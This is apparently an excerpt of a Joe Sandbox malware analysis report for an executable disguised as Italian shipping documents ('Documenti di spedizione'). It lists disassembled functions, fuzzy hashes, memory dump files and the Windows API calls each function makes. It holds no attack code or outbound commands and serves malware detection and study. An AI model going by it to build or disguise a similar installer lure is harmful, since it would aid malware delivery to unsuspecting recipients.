                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                        • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                        • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                        • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                        • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                          • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                          • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                        • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                        • wsprintfA.USER32 ref: 0040621C
                                        • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                        • GlobalFree.KERNEL32(00000000), ref: 00406305
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                          • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 0040604B
                                          • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %ls=%ls$[Rename]
                                        • API String ID: 2171350718-461813615
                                        • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                        • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                        • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                        • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                        APIs
                                        • GetCommandLineW.KERNEL32(00000400), ref: 73A91B96
                                        • lstrcpynW.KERNEL32(?,00000000), ref: 73A91BA4
                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 73A91C03
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 73A91C15
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 73A91C22
                                        • CloseHandle.KERNEL32(?), ref: 73A91C31
                                        • CloseHandle.KERNEL32(?), ref: 73A91C36
                                        • ExitProcess.KERNEL32 ref: 73A91C3B
                                        • ExitProcess.KERNEL32 ref: 73A91C46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1701148820.0000000073A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 73A90000, based on PE: true
                                        • Associated: 00000000.00000002.1701090358.0000000073A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701169618.0000000073A92000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701225152.0000000073A93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701247983.0000000073A94000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73a90000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Process$Exit$CloseHandle$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                        • String ID: "$D
                                        • API String ID: 2956148522-1154559923
                                        • Opcode ID: 5812b78d80b5e0dae5f6bd2e8aeb8285f107c6363ca912792c99f65c677e6e66
                                        • Instruction ID: 0a6a33dbaef4f24621f3aa597d46202550b082c4419b972abf90a40efdcc97f4
                                        • Opcode Fuzzy Hash: 5812b78d80b5e0dae5f6bd2e8aeb8285f107c6363ca912792c99f65c677e6e66
                                        • Instruction Fuzzy Hash: 9921A37280011DAEEF11AB95CD4AFDF7BBDEB04311F610466E20BB2094EB700E49CBA1
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                        • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406806
                                        • "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe", xrefs: 00406849
                                        • *?|<>/":, xrefs: 00406857
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-1934191174
                                        • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                        • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                        • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                        • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                        • GetSysColor.USER32(00000000), ref: 00404598
                                        • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                        • SetBkMode.GDI32(?,?), ref: 004045B0
                                        • GetSysColor.USER32(?), ref: 004045C3
                                        • SetBkColor.GDI32(?,?), ref: 004045D3
                                        • DeleteObject.GDI32(?), ref: 004045ED
                                        • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                        • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                        • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                        • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                        APIs
                                        • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                          • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                        • String ID: 9
                                        • API String ID: 163830602-2366072709
                                        • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                        • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                        • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                        • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,73A910E0), ref: 73A91990
                                        • GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,73A910E0), ref: 73A9199E
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 73A919BD
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 73A919E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1701148820.0000000073A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 73A90000, based on PE: true
                                        • Associated: 00000000.00000002.1701090358.0000000073A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701169618.0000000073A92000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701225152.0000000073A93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1701247983.0000000073A94000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73a90000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                        • String ID: IsWow64Process2$KERNEL32
                                        • API String ID: 977827838-1019154776
                                        • Opcode ID: f16add58ff2ace744c0c1c2a29421b021bce02541329640d67da93bd7d613d29
                                        • Instruction ID: 87428dc0ca2c9901243a72cfd1b7e7abacedb789e2761fdc1b712eb6bc26f6d4
                                        • Opcode Fuzzy Hash: f16add58ff2ace744c0c1c2a29421b021bce02541329640d67da93bd7d613d29
                                        • Instruction Fuzzy Hash: 0F014076D00219BEEB01ABA58C46BAF7BFCDF08150F014456A912F2185EB75DA05C7A4
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                        • GetMessagePos.USER32 ref: 00404EB4
                                        • ScreenToClient.USER32(?,?), ref: 00404ECE
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                        • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                        • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                        • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                        • MulDiv.KERNEL32(0002F000,00000064,000B6BC8), ref: 00402FE1
                                        • wsprintfW.USER32 ref: 00402FF1
                                        • SetWindowTextW.USER32(?,?), ref: 00403001
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402FEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                        • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                        • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                        • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                        • GlobalFree.KERNEL32(?), ref: 00402A0B
                                        • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                        • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                        • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                        • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401D9F
                                        • GetClientRect.USER32(?,?), ref: 00401DEA
                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                        • DeleteObject.GDI32(00000000), ref: 00401E3E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                        • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                        • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                        • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E56
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                        • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                        • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                        • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                        • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                        APIs
